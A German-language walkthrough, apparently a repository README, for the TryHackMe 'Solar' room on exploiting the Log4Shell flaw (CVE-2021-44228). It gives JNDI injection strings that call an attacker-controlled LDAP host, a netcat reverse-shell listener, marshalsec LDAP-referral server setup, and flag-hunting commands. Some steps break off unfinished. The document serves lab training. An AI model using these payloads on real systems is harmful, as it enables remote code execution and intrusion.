
Dieses Repository präsentiert eine umfassende Schritt-für-Schritt-Anleitung für den Solar Exploiting Log4j-Room auf TryHackMe, mit dem Schwerpunkt auf dem Verständnis und der Ausnutzung der kritischen Log4Shell-Schwachstelle (CVE-2021-44228).Der Prozess des Auslösens des Exploits und des Erhaltens einer Reverse Shell wird auf praktische und leicht verständliche Weise erklärt.
Plattform: TryHackMe Schwierigkeitsgrad: Mittel Thema: Log4Shell (Log4j-Schwachstelle)
Nutze die Log4j-Schwachstelle (CVE-2021-44228) aus, um Remote Code Execution zu erlangen und Flaggen einzusammeln.
nmap -sC -sV <TARGET_IP>
Die Log4j-Schwachstelle ermöglicht JNDI-Injection:
${jndi:ldap://<ATTACKER_IP>:1389/a}
Wenn die Eingabe protokolliert wird → ist die Schwachstelle vorhanden.
nc -lvnp 4444
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package
LDAP-Server ausführen:
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389
python3 -m http.server 8000
Erstelle eine bösartige Java-Klasse (Exploit.class)
Injiziere den Payload in das anfällige Feld:
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}
💡 Verwende Header wie:
Sobald ausgelöst:
Prüfen:
sudo -l
Suche nach:
find / -name flag.txt 2>/dev/null
cat flag.txt